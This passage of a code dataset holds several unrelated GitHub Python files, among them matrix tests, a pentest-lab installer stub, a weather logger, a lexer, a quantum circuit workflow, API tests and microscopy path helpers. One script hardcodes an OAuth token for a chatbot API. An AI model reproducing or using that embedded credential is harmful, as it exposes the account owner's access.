]\n)\n@pytest.mark.parametrize(\n \"normalization, dense_function, sparse_function, rtol, error\",\n [\n (\"svd\",\n linalg.svdvals,\n lambda x: sparse.linalg.svds(x, k=1, return_singular_vectors=False),\n 1e-7,\n None),\n (\"eig\",\n linalg.eigvals,\n lambda x: sparse.linalg.eigs(x, k=1, return_eigenvectors=False),\n 1e-7,\n None),\n (\"multiply\",\n np.std,\n lambda x: np.std(x.data),\n 1e-1,\n None),\n (\"spectral_radius\", None, None, None, NotImplementedError),\n ]\n)\nclass TestNorm(TestMatrix):\n\n RM = RandomMatrix\n factor = 10\n\n @property\n def kw(self):\n return {key: getattr(self, key) for key in [\"n_rows\", \"n_cols\", \"factor\", \"random_seed\", \"factor\"]}\n\n def test_norm(self, distribution, normalization, dense_function, sparse_function, rtol, error):\n\n if error is None:\n rm = self.RM(distribution=distribution, normalization=normalization, **self.kw)\n A = rm()\n f = dense_function if not sparse.issparse(A) else sparse_function\n expected = np.max(np.abs(f(A)))\n if distribution != \"uniform\":\n assert_allclose( self.factor, expected, rtol=rtol )\n\n else:\n with pytest.raises(error):\n rm = self.RM(distribution=distribution, normalization=normalization, **self.kw)\n\n\nclass TestSparseNorm(TestNorm):\n \"\"\"This inherits and runs sparse versions of all normalization tests above\"\"\"\n\n RM = SparseRandomMatrix\n factor = 10\n format = \"csr\"\n density = 0.7\n\n @property\n def kw(self):\n return {key: getattr(self, key) for key in [\"n_rows\", \"n_cols\", \"random_seed\", \"factor\", \"format\", \"density\"]}\n\n@pytest.mark.parametrize(\n \"n_cols, density, sparsity, connectedness, error\",\n [\n (10, 0.1, None, None, None),\n (10, None, 0.9, None, None),\n (10, None, None, 1, None),\n (10, None, None, None, TypeError),\n (10, 0.1, 0.9, None, TypeError),\n (10, 0.1, None, 1, TypeError),\n (10, None, 0.9, 1, TypeError),\n (5, 0.1, None, None, None),\n (5, None, 0.9, None, None),\n (5, None, None, 1, TypeError),\n ]\n )\ndef test_sparse_mat_inputs(n_cols, density, sparsity, connectedness, error):\n \"\"\"test the whole density, sparsity, connectivity stuff\"\"\"\n\n if error is None:\n sm = SparseRandomMatrix(\n n_rows=10,\n n_cols=n_cols,\n factor=1.0,\n distribution=\"normal\",\n normalization=\"multiply\",\n density=density,\n sparsity=sparsity,\n connectedness=connectedness,\n )\n sm()\n\n if n_cols == 10:\n assert_allclose(sm.density, 0.1)\n else:\n with pytest.raises(error):\n sm = SparseRandomMatrix(\n n_rows=10,\n n_cols=n_cols,\n factor=1.0,\n distribution=\"normal\",\n normalization=\"multiply\",\n density=density,\n sparsity=sparsity,\n connectedness=connectedness,\n )\n","repo_name":"timothyas/xesn","sub_path":"xesn/test/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71984554803","text":"#!/usr/bin/env python3\n\nimport logging\nimport argparse\nimport os\nfrom src.core import *\nfrom src.utils import *\nfrom src.tasks import installer\nfrom config import config\n\n\n__version__ = \"0.1\"\n__date__ = \"10.05.2021\"\n__author__ = \"Fabien Guillot\"\n__email__ = \"fguillot@vectra.ai\"\n__description__= \"AWS Pentest Lab Environment\"\n\n\n\ndef main(args):\n \n if args.install:\n \n checkDistro()\n create_dir(config.BASE_INSTALL_PATH)\n whoami()\n checkPythonDefaultVersion()\n checkpythonMinVersion()\n #install_prereqs()\n \n if checkpyenv() is not True:\n \n print('installing pyenv for current user...')\n installPyenv()\n \n askSudoPassword()\n installer() \n \n elif args.uninstall:\n \n print('Uninstall')\n \n else:\n \n print_error('No valide choice. Exiting...')\n exit()\n\nif __name__ == '__main__':\n \n if not check_internet:\n \n print_error('An internet connection is required. Exiting...')\n exit()\n \n else:\n \n print_status('Internet connection OK') \n \n \n parser = argparse.ArgumentParser(description='A set of tools for S3')\n parser.add_argument('-i', '--install', dest = \"install\", action = \"store_true\", default = False, help='Install the environement')\n parser.add_argument('-u', '--uninstall', dest = \"uninstall\", action = \"store_true\", default = False, help='Install the environement')\n parser.add_argument(\"-v\", \"--debug\", dest=\"debug\", action = \"store_true\", default = False, help = \"Print debug information to the screen.\")\n \n \n try:\n\n args = parser.parse_args()\n main(args)\n \n except Exception as e:\n logging.exception(\"Exception: {0!s}\".format(e))\n exit(1)\n \n ","repo_name":"danymello/vectra_aws_pentest","sub_path":"aws_pentest_lab.py","file_name":"aws_pentest_lab.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39149489910","text":"import requests\nimport os\nfrom sqlalchemy import create_engine, Integer, Column, String, DECIMAL, DateTime\nfrom sqlalchemy.orm import declarative_base, Session\n\nAPI_BASE_URL = 'https://api.weatherapi.com/v1/'\nAPI_KEY = os.getenv('WEATHER_API_KEY')\nCITY = 'Ahwaz'\nDB_USERNAME = os.getenv('WEATHER_DB_USERNAME')\nDB_PASSWORD = os.getenv('WEATHER_DB_PASSWORD')\nDB_HOST = os.getenv('WEATHER_DB_HOST')\nDB_NAME = os.getenv('WEATHER_DB_NAME')\n\nengine = create_engine(f'mysql+mysqldb://{DB_USERNAME}:{DB_PASSWORD}@{DB_HOST}/{DB_NAME}')\nBase = declarative_base()\n\n\nclass Weather(Base):\n __tablename__ = 'weather_table'\n\n id = Column(Integer, primary_key=True)\n city_name = Column(String(255), nullable=False)\n temp_c = Column(DECIMAL(precision=5, scale=2))\n local_time = Column(DateTime)\n wind_kph = Column(DECIMAL(precision=5, scale=2))\n\n\nBase.metadata.create_all(engine)\n\n\ndef get_weather():\n url = API_BASE_URL + 'current.json'\n params = {\n 'q': CITY,\n 'key': API_KEY,\n }\n\n return requests.get(\n url,\n params=params,\n ).json()\n\n\nif __name__ == '__main__':\n weather_json = get_weather()\n with Session(engine) as session:\n weather = Weather(\n city_name=weather_json['location']['name'],\n temp_c=weather_json['current']['temp_c'],\n local_time=weather_json['location']['localtime'],\n wind_kph=weather_json['current']['wind_kph'],\n )\n session.add(weather)\n session.commit()\n","repo_name":"alinri/weather-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32795954778","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#ex190\n#리스트 입력\napart = [ [101, 102], [201, 202], [301, 302] ]\n#for문 확인, 값 출력\nfor row in apart:\n for col in row:\n print(col, \"호\")\n#-----출력\nprint(\"-\" * 5)\n\n","repo_name":"wnsl01/MSE_Python","sub_path":"ex190.py","file_name":"ex190.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29133796696","text":"import ply.lex as lex\n\ntokens = ['NAME', 'NUMBER']\nliterals = [ '+','=', '(', ')']\n\nt_ignore = ' \\t'\nt_NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'\n\ndef t_NUMBER(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\ndef t_error(t):\n if __name__ == \"__main__\":\n print(\"Illegal character '%s'\" % t.value[0])\n else:\n print(\"Error in input\")\n exit()\n t.lexer.skip(1)\n\nlexer = lex.lex()\n\nline = \"\"\ndata = \"\"\n\nwhile True:\n line = input(\"\")\n if line == \"#\":\n break\n if data == \"\":\n data = line\n else:\n data += '\\n' + line\n\nlexer.input(data)\n\nwhile True:\n tok = lexer.token()\n if not tok: \n break\n if __name__ == \"__main__\":\n print(('{}'.format(tok.type), tok.value, tok.lineno, tok.lexpos))","repo_name":"kialanpillay/compiler-construction","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25947744559","text":"'''\nget app_key which will be used in api.py for requesting clinc\nrerun this file only if the app_key in api.py expired\n'''\n\n\nimport requests\n\noauth_token = 'PODBMIDjizV32PyTOCo1muXxcqw7CI'\n\nprint(requests.post(\n 'https://api.clinc.ai:443/v1/apps/applicationtoken/',\n params={'force': 'True', 'scopes': 'query'},\n headers={'Authorization': 'Bearer {}'.format(oauth_token),\n 'Content-Type': 'application/x-www-form-urlencoded'}\n).json())\n","repo_name":"quyuyi/convoAI-travel-agent","sub_path":"script/clinc.py","file_name":"clinc.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"20944904159","text":"'''Given an input by the user in the form of a positive integer,\nthe program should print out a triangle-shaped pattern made of\nthe star character (*). The input should be stored in a variable called N.\nN represents the number of rows in the pattern. The number of stars in each row increases by 2 each time.'''\nN = int(input('N: '))\nx = 1\n'''for i in range(0, N):\n for j in range(0, i+1):\n print(f\"{carac:^5}\", end= '')\n print('')'''\nfor i in range(N, 0, -1):\n spaces = i - 1\n caracteres = N - i + x\n print(' ' * spaces, '*' * caracteres)\n x = x + 1\n\n","repo_name":"MarceliFioravante/python_exercises","sub_path":"python_exercises/Star_triangle.py","file_name":"Star_triangle.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71743540722","text":"data = open('data.txt', 'r')\n_list = data.read().split('\\n')\ndata.close()\n\ndef get_string_and_map():\n inst_map = {}\n string = \"\"\n for exp in _list:\n if(exp == ''):\n continue\n \n if('->' in exp):\n elem1 = (exp.split('->')[0]).strip()\n elem2 = (exp.split('->')[1]).strip()\n\n if not (elem1 in inst_map):\n inst_map[elem1] = elem2\n continue\n \n string = exp\n return inst_map, string\n\ndef modify(string_map, inst_map, step_count):\n while(step_count):\n new_string = {}\n for elem in string_map:\n count = string_map[elem]\n \n\n e1 = elem[0] + inst_map[elem]\n e2 = inst_map[elem] + elem[1]\n\n if(e1 not in new_string):\n new_string[e1] = count\n else:\n new_string[e1] += count\n\n if(e2 not in new_string):\n new_string[e2] = count\n else:\n new_string[e2] += count\n\n string_map = new_string\n step_count -= 1\n return string_map\n \n \ndef get_string_map(string):\n string_map = {}\n for i in range(0, len(string) - 1):\n exp = string[i:i +2]\n if(exp not in string_map):\n string_map[exp] = 1\n else:\n string_map[exp] += 1\n return string_map\n\ndef get_diff(string_map):\n max_count = 0\n min_count = 21881896935290000000\n counter = {}\n flag = 0\n for s in string_map:\n e1 = s[0]\n e2 = s[1]\n value = string_map[s]\n if(flag == 0):\n counter[e1] = value\n counter[e2] = value\n flag = 1\n else:\n if(e2 not in counter):\n counter[e2] = value\n else:\n counter[e2] += value\n\n for c in counter:\n max_count = max(max_count, counter[c])\n min_count = min(min_count, counter[c])\n\n return max_count - min_count\n\ninst_map, string = get_string_and_map()\nstring_map = get_string_map(string)\nstring_map = modify(string_map, inst_map, 40)\nres = get_diff(string_map)\nprint(res)\n\n ","repo_name":"anugoen4/AOC_2021","sub_path":"Day_14_Extended_Polymerization/python_part_2.py","file_name":"python_part_2.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39230364845","text":"import qe.sdk.v1 as qe\nimport numpy as np\nimport typing\nfrom typing import List, Optional, Union\nimport json\n\nfrom zquantum.core.history.recorder import recorder\nfrom zquantum.core.history.save_conditions import every_nth\nfrom zquantum.core.utils import create_object\nfrom zquantum.core.interfaces.ansatz import Ansatz\nfrom zquantum.core.serialization import save_optimization_results\nimport zquantum.core.bitstring_distribution\nfrom zquantum.core.bitstring_distribution import BitstringDistribution\nfrom zquantum.core.typing import Specs\nfrom zquantum.core.utils import load_from_specs\nfrom zquantum.qcbm.ansatz import QCBMAnsatz\nfrom zquantum.qcbm.cost_function import QCBMCostFunction\nfrom qequlacs import QulacsSimulator\nimport itertools\nimport random\nimport csv\n\ndef get_rc(n):\n assert isinstance(n,int)\n root = np.sqrt(n)\n if int(root) == root:\n return root,root\n else:\n for i in range(int(root),0,-1):\n co,rem = divmod(n,i)\n if rem == 0:\n return co,i\n return n,1\n\n\n\n@qe.step(\n resource_def=qe.ResourceDefinition(\n cpu=\"2000m\",\n memory=\"10Gi\",\n disk=\"2Gi\",\n ),\n)\ndef get_specs(method: str,options: dict):\n specs={}\n if method in ['adam',\n 'adagrad',\n 'adamax',\n 'nadam',\n 'sgd',\n 'momentum',\n 'nesterov',\n 'rmsprop',\n 'rmsprop-nesterov']:\n\n specs['method']=method\n specs['options']=options\n specs['module_name']=\"zquantum.optimizers.gd_optimizer\"\n specs['function_name']='GDOptimizer'\n\n elif method in ['cobyla','l-bfgs-b','bfgs']:\n specs['method'] = method\n specs[\"module_name\"]=\"zquantum.optimizers.scipy_optimizer\"\n specs['function_name']='ScipyOptimizer'\n specs['options']=options\n elif method[0:6] == 'basin-':\n minimizer_kwargs={}\n specialized=method[6:]\n minimizer_kwargs['method'] = specialized\n for k,v in options.items():\n if k == 'minimizer_kwargs':\n for q,p in v.items():\n minimizer_kwargs[q]=p\n else:\n specs[k]=v\n specs['minimizer_kwargs']=minimizer_kwargs\n specs['module_name']='zquantum.optimizers.basin_hopping'\n specs['function_name']='BasinHoppingOptimizer'\n specs['recorder'] = lambda x: recorder(x,save_condition=every_nth(5))\n return specs\n\n@qe.step(\n resource_def=qe.ResourceDefinition(\n cpu=\"2000m\",\n memory=\"10Gi\",\n disk=\"2Gi\",\n ),\n)\ndef get_ansatz(n_qubits:int,n_layers:int,topology:str):\n return QCBMAnsatz(n_layers,n_qubits,topology)\n\n\n@qe.step(\n resource_def=qe.ResourceDefinition(\n cpu=\"2000m\",\n memory=\"10Gi\",\n disk=\"2Gi\",\n ),\n)\ndef generate_random_ansatz_params(\n ansatz,\n number_of_parameters: Optional[int] = None,\n min_value: float = -np.pi * 0.5,\n max_value: float = np.pi * 0.5,\n seed: int = None,\n):\n\n if ansatz is not None:\n number_of_parameters = ansatz.number_of_params\n\n if seed is not None:\n np.random.seed(seed)\n\n params = np.random.uniform(min_value, max_value, number_of_parameters)\n return params\n\n@qe.step(\n resource_def=qe.ResourceDefinition(\n cpu=\"2000m\",\n memory=\"10Gi\",\n disk=\"2Gi\",\n ),\n)\ndef get_distribution(n: int):\n nrows,ncols = get_rc(n)\n data = []\n for h in itertools.product([0, 1], repeat=ncols):\n pic = np.repeat([h], nrows, 0)\n data.append(pic.ravel().tolist())\n\n for h in itertools.product([0, 1], repeat=nrows):\n pic = np.repeat([h], ncols, 1)\n data.append(pic.ravel().tolist())\n\n data = np.unique(np.asarray(data), axis=0)\n num_desired_patterns = int(len(data))\n num_desired_patterns = max(num_desired_patterns, 1)\n data = random.sample(list(data), num_desired_patterns)\n\n distribution_dict = {}\n for pattern in data:\n bitstring = \"\"\n for qubit in pattern:\n bitstring += str(qubit)\n\n distribution_dict[bitstring] = 1.\n return BitstringDistribution(distribution_dict)\n\n\n@qe.step(\n resource_def=qe.ResourceDefinition(\n cpu=\"2000m\",\n memory=\"10Gi\",\n disk=\"10Gi\"\n ),\n)\ndef optimize_variational_qcbm_circuit(\n ansatz,\n optimizer_specs,\n initial_parameters,\n target_distribution,\n keep_history: bool,\n):\n backend = QulacsSimulator()\n if isinstance(optimizer_specs, str):\n optimizer_specs = json.loads(optimizer_specs)\n optimizer = create_object(optimizer_specs)\n cost_function = QCBMCostFunction(\n ansatz=ansatz,\n backend=backend,\n n_samples = None,\n distance_measure=zquantum.core.bitstring_distribution.compute_clipped_negative_log_likelihood,\n distance_measure_parameters={\"epsilon\": 1e-6},\n target_bitstring_distribution=target_distribution,\n )\n opt_results = optimizer.minimize(cost_function, initial_parameters, keep_history)\n #save_optimization_results(opt_results, \"qcbm-optimization-results.json\")\n return opt_results\n@qe.workflow(name='top20-{n_layers}-{topology}-{method}-{tag}',\n import_defs=[\n qe.GitImportDefinition.get_current_repo_and_branch(),\n qe.GitImportDefinition(\n repo_url=\"git@github.com:zapatacomputing/z-quantum-core.git\",\n branch_name=\"master\",\n ),\n qe.GitImportDefinition(\n repo_url=\"git@github.com:zapatacomputing/z-quantum-optimizers.git\",\n branch_name=\"gd_opt\",\n ),\n qe.GitImportDefinition(\n repo_url=\"git@github.com:zapatacomputing/z-quantum-qcbm.git\",\n branch_name=\"master\",\n ),\n qe.GitImportDefinition(\n repo_url=\"git@github.com:zapatacomputing/qe-qulacs.git\",\n branch_name=\"master\",\n )\n\n ])\ndef workflow(n_layers: int, n_qubits: int, topology: str, method: str,options: dict, keep_history: bool = True, tag: int = None):\n target_distribution=get_distribution(n_qubits)\n ansatz=get_ansatz(n_qubits,n_layers,topology)\n initial_parameters=generate_random_ansatz_params(ansatz)\n optimizer_specs=get_specs(method,options)\n output = optimize_variational_qcbm_circuit(ansatz,optimizer_specs,\n initial_parameters,target_distribution,\n keep_history)\n return output\n\nif __name__ == \"__main__\":\n n_layers=3\n n_qubits=12\n topology='all'\n filename=\"top20_ids.csv\"\n\n method,options ='rmsprop',{'lr':0.01,'maxiter':30}\n #method,options ='l-bfgs-b', {'ftol':1e-12,'gtol':1e-12,'maxiter':3500,'maxfun':int(1e9),}\n #method,options ='basin-l-bfgs-b', {'niter':50,'minimizer_kwargs':{'method':'l-bfgs-b','maxiter':500}}\n\n with open(filename, 'a+') as file:\n fieldnames = ['n_layers', 'topology', 'method', 'id']\n w = csv.DictWriter(file, fieldnames=fieldnames)\n if file.tell() == 0:\n w.writeheader()\n for tag in range(0,2):\n qe.step.unique_names = []\n wf = workflow(n_layers,n_qubits,topology,method,options,tag=tag)\n out = wf.submit()\n id = out.workflow_id\n writeout={'topology':topology,'n_layers':n_layers,'method':method,'id':id}\n print(id)\n #w.writerow(writeout)\n\n","repo_name":"salperinlea/bars-and-stripes","sub_path":"workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":7558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26895964183","text":"'''\n@Descripttion: getLanguage接口APItest脚本\n@Author: Tommy\n@Date: 2020-06-02 16:01:55\nLastEditors: Tommy\nLastEditTime: 2020-08-13 11:01:05\n'''\nimport unittest\nimport requests\nimport time\nimport json\n# from tool import Tool\n\n\nclass GetLanguage(unittest.TestCase):\n \"\"\"Language API测试\"\"\"\n @classmethod\n def setUpClass(cls):\n with open(\"config.json\", 'r') as f:\n cls.value_dict = json.load(f)\n\n def setUp(self):\n self.game_date = time.strftime(\"%Y%m%d\", time.localtime())\n self.url = ''.join([self.__class__.value_dict['url'], 'getLanguage_v1'])\n # self.url = 'https://tapcolor-lite.weplayer.cc/getLanguage?'\n self.params = {\n \"game_ver\": self.__class__.value_dict['game_ver'],\n \"os_type\": self.__class__.value_dict['os_type'],\n \"register_date\": self.__class__.value_dict['register_date'],\n \"game_date\": self.game_date,\n \"game_actDay\": self.__class__.value_dict['game_actDay'],\n \"language_key\": \"ChineseSimplified\",\n \"language_version\": \"-1\",\n \"forece_get\": \"1\"\n }\n\n # def test_getLanguage_content(self):\n # '''测试新老接口返回数值是否相同'''\n # r1 = requests.get(self.url, params=self.params)\n # result1 = r1.json()\n # self.url = ''.join(\n # [self.__class__.value_dict['url_new'], 'getLanguage_v1'])\n # r2 = requests.get(self.url, params=self.params)\n # result2 = r2.json()\n # Tool.cmp(result2, result1, \"language\")\n\n def test_getLanguage_success(self):\n '''测试Language成功'''\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['errorCode'], -1)\n self.assertNotEqual(len(result['data']['language']), 0, msg=\"language数据为空\")\n\n def test_getLanguage_ios_success(self):\n '''测试IOS Language成功'''\n self.params['os_type'] = \"Ios\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['errorCode'], -1)\n self.assertNotEqual(len(result['data']['language']), 0, msg=\"language数据为空\")\n\n def test_getLanguage_languageNone(self):\n '''测试参数缺失'''\n self.params['language_key'] = \"\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(\n result['error_msg'],\n \"path: language_key, error: language_key is required.\")\n\n def test_getLanguage_ios_languageNone(self):\n '''测试IOS 参数缺失'''\n self.params['language_key'] = \"\"\n self.params['os_type'] = \"Ios\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(\n result['error_msg'],\n \"path: language_key, error: language_key is required.\")\n\n def test_getLanguage_dateError(self):\n '''测试日期格式错误'''\n self.params['game_date'] = \"2020-05-29\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(\n result['error_msg'],\n \"path: game_date, error: game_date must have a length between 8 and 8.\"\n )\n\n def test_getLanguage_ios_dateError(self):\n '''测试IOS 日期格式错误'''\n self.params['game_date'] = \"2020-05-29\"\n self.params['os_type'] = \"Ios\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(\n result['error_msg'],\n \"path: game_date, error: game_date must have a length between 8 and 8.\"\n )\n\n def test_getLanguage_requestsError(self):\n '''测试requests错误'''\n del self.params['game_ver']\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(result['error_msg'],\n \"path: game_ver, error: game_ver is required.\")\n\n def test_getLanguage_ios_requestsError(self):\n '''测试IOS requests错误'''\n del self.params['game_ver']\n self.params['os_type'] = \"Ios\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['error_code'], 666)\n self.assertEqual(result['error_msg'],\n \"path: game_ver, error: game_ver is required.\")\n\n def test_getLanguage_type(self):\n '''验证返回值是否正确'''\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['errorCode'], -1)\n self.assertNotEqual(len(result['data']['language']), 0, msg=\"language数据为空\")\n self.assertIsInstance(result['data']['language'], dict)\n\n def test_getLanguage_ios_type(self):\n '''验证IOS 返回值是否正确'''\n self.params['os_type'] = \"Ios\"\n r = requests.get(self.url, params=self.params)\n result = r.json()\n # 断言\n self.assertEqual(result['errorCode'], -1)\n self.assertNotEqual(len(result['data']['language']), 0, msg=\"language数据为空\")\n self.assertIsInstance(result['data']['language'], dict)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Tbacode/ToolSuit","sub_path":"工具包/color_InterfaceTest/API_test/test_case/tapcolor_api_getLanguage.py","file_name":"tapcolor_api_getLanguage.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"19250050820","text":"import os\nimport sys\nimport socket\nfrom sys import platform as _platform\nimport numpy as np\n\n\ndef find_hostname_and_ip():\n \"\"\"Finds the hostname and IP address to go in the log file.\n\n Args:\n No arguments\n\n Returns:\n host (str): Name of the host machine executing the script.\n ip_address (str): IP adress of the machine that runs the script.\n operating_system (str): Operating system of the machine that runs the script.\n\n \"\"\"\n host = 'undetermined'\n ip_address = 'undetermined'\n operating_system = 'undetermined'\n\n try:\n host = socket.gethostbyaddr(socket.gethostname())[0]\n except socket.herror:\n host = \"undetermined\"\n\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n try:\n # doesn't even have to be reachable\n my_socket.connect(('10.255.255.255', 1))\n ip_address = my_socket.getsockname()[0]\n except socket.error:\n ip_address = '127.0.0.1'\n finally:\n my_socket.close()\n\n if _platform in (\"linux\", \"linux2\"):\n # linux\n operating_system = 'Linux'\n elif _platform == \"darwin\":\n # MAC OS X\n operating_system = 'Mac OSX'\n elif _platform == \"win32\":\n # Windows\n operating_system = 'Windows'\n elif _platform == \"win64\":\n # Windows 64-bit\n operating_system = 'Windows'\n\n return host, ip_address, operating_system\n\n\ndef find_exponent(number_string):\n '''Returns the number of significant digits in a number. This takes into account\n strings formatted in 1.23e+3 format and even strings such as 123.450'''\n # change all the 'E' to 'e'\n number_string = number_string.lower()\n if 'e' in number_string:\n # return the length of the numbers before the 'e'\n exponent_string = number_string.split('e', 1)[1]\n return exponent_string # to compenstate for the decimal point\n else:\n # put it in e format and return the result of that\n ### NOTE: the 8 below is picked as on my system floats convert to the\n ### mantissa and exponent format when the exponent reaches 5 and the\n ### 8 allows some change for different systems\n number = ('%.*e' %(8, float(number_string))).split('e')\n #pass it back to the beginning to be parsed\n return find_exponent('e'.join(number))\n #return \"error, number not recognised as a float\"\n\n\ndef plus_and_minus(value, uncertainty):\n ''' Takes a value and its uncertainty and provides string values for each\n which can be used in the format 'value +/- uncertainty'\n\n Args:\n value: A float the value that has an error value.\n uncertainty: A float the uncetainty of the value which is generally\n smaller than the value.\n Returns:\n value_str: A string with the value given to the number of relevant places\n as determined by the uncertainty.\n uncertainty_str: A string with the uncertainty given to 2 decimal places.\n '''\n\n\n uncertainty_str = \"%.2g\" % (uncertainty)\n uncertainty_expo = int(find_exponent(uncertainty_str))\n value_str = \"%.2g\" % (value)\n value_expo = int(find_exponent(value_str))\n if value_expo >= uncertainty_expo:\n whole_number = 1\n fraction = 1\n if uncertainty_expo > 0:\n whole_number = uncertainty_expo\n if uncertainty_expo < 0:\n fraction = abs(uncertainty_expo)+1\n\n uncertainty_str = \"%.2f\" % (uncertainty)\n value_str = '{0:{1}.{2}f}'.format(value, whole_number, fraction)\n\n uncertainty_str = '{0:.2f}'.format(uncertainty)\n if value_expo < uncertainty_expo:\n whole_number = 1\n fraction = 1\n if value_expo > 0:\n whole_number = value_expo\n if value_expo < 0:\n fraction = abs(value_expo)+1\n\n value_str = \"%.2f\" % (value)\n uncertainty_str = '{0:{1}.{2}f}'.format(uncertainty, whole_number, fraction)\n\n return value_str, uncertainty_str\n\n\n\ndef primary_filename_and_path_setup(info):\n ''' Takes information from the python dictionary, info, on the location of the\n input data file to create the data strings nescessary to create the output\n path and file names for images of plots, the html report and output data\n files. The filename and path is different for relative_positions.py as it\n reads experimental data as a primary source to models which read the output\n of relative_positions.py. This function is for relative_positions.py.\n\n Args:\n info (dict):\n A python dictionary containing a collection of useful\n parameters such as the filenames and paths. New values written\n to the dictionary do not need to be explicitly returned by\n the function as they can be seen in info in other functions.\n '''\n\n path, in_file_no_path = os.path.split(info['in_file_and_path'])\n\n index_of_dot = in_file_no_path.index(\".\")\n filename_without_extension = in_file_no_path[:index_of_dot]\n\n # Put parameters in directory name\n parameter_str = \"filter_\"+str(info['filter_dist'])+\"_\"+str(info['dims'])+\"D_\"\n\n results_dir = (path+r\"/PERPL_\"+info['prog']+r\"/\"+filename_without_extension\n +r\"/\"+parameter_str)\n\n # Include colour channel information, if used\n if info['colours_analysed'] == 1:\n results_dir = results_dir + 'col' +repr(info['start_channel'])+ '_'\n if info['colours_analysed'] == 2:\n results_dir = (results_dir\n + 'cols' +repr(info['start_channel'])+ 'to' +repr(info['end_channel'])+ '_'\n )\n\n # Include histogram bin-size\n results_dir = results_dir + 'bin' +repr(info['bin_size'])+ '_'\n\n # Include start time\n results_dir = results_dir + info['start']\n\n # Set up short directory name to save space\n short_filename_without_extension = \\\n filename_without_extension[:5]+r\"-s-\"+filename_without_extension[-5:]\n\n # Include some parameters\n short_parameter_str = \"f_\"+str(info['filter_dist'])+\"_\"+str(info['dims'])+\"D_\"\n\n short_results_dir = (\n path+r\"/PERPL_\"\n +info['prog_short_name']\n +r\"/\"+short_filename_without_extension\n +r\"/\"+short_parameter_str\n )\n if info['colours_analysed'] == 1:\n short_results_dir = short_results_dir + 'c' +repr(info['start_channel'])+ '_'\n if info['colours_analysed'] == 2:\n short_results_dir = (short_results_dir\n + 'c' +repr(info['start_channel'])+ '-' +repr(info['end_channel'])\n + '_'\n )\n short_results_dir = short_results_dir + 'b' + repr(info['bin_size'])+ '_'\n short_results_dir = short_results_dir + info['start']\n\n info['results_dir'] = results_dir\n info['in_file_no_extension'] = filename_without_extension\n info['in_file_no_path'] = in_file_no_path\n info['short_results_dir'] = short_results_dir\n info['short_filename_without_extension'] = short_filename_without_extension\n\n\ndef secondary_filename_and_path_setup(info):\n ''' Takes information from the python dictionary, info, on the location of the\n input data file to create the data strings nescessary to create the output\n path and file names for images of plots, the html report and output data\n files. The filename and path is different for relative_positions.py as it\n reads experimental data as a primary source to models which read the output\n of relative_positions.py. This function is for model scripts.\n\n Args:\n info (dict):\n A python dictionary containing a collection of useful\n parameters such as the filenames and paths. New values written\n to the dictionary do not need to be explicitly returned by\n the function as they can be seen in info in other functions.\n '''\n\n path, in_file_no_path = os.path.split(info['in_file_and_path'])\n\n index_of_dot = in_file_no_path.index(\".\")\n filename_without_extension = in_file_no_path[:index_of_dot]\n\n parameter_str = \"filter_\"+str(info['filter_dist'])+\"_\"\n\n\n results_dir = (path+r\"/\"+info['prog']+r\"/\"+r\"/\"+parameter_str+info['start'])\n\n\n short_filename_without_extension = \\\n filename_without_extension[:5]+r\"-s-\"+filename_without_extension[-5:]\n short_parameter_str = \"f_\"+str(info['filter_dist'])+\"_\"\n\n short_results_dir = (path+r\"/\"+info['prog_short_name']+r\"/\"+short_filename_without_extension\n +r\"/\"+short_parameter_str+info['start'])\n\n info['results_dir'] = results_dir\n info['in_file_no_extension'] = filename_without_extension\n info['in_file_no_path'] = in_file_no_path\n info['short_results_dir'] = short_results_dir\n info['short_filename_without_extension'] = short_filename_without_extension\n\n\ndef secondary_read_data_in(info):\n \"\"\"Reads data from the input file thats filename is provided as an argument\n to this program or from the command line while this program executes.\n This reader is for a model and so only reads data that is ouput from\n 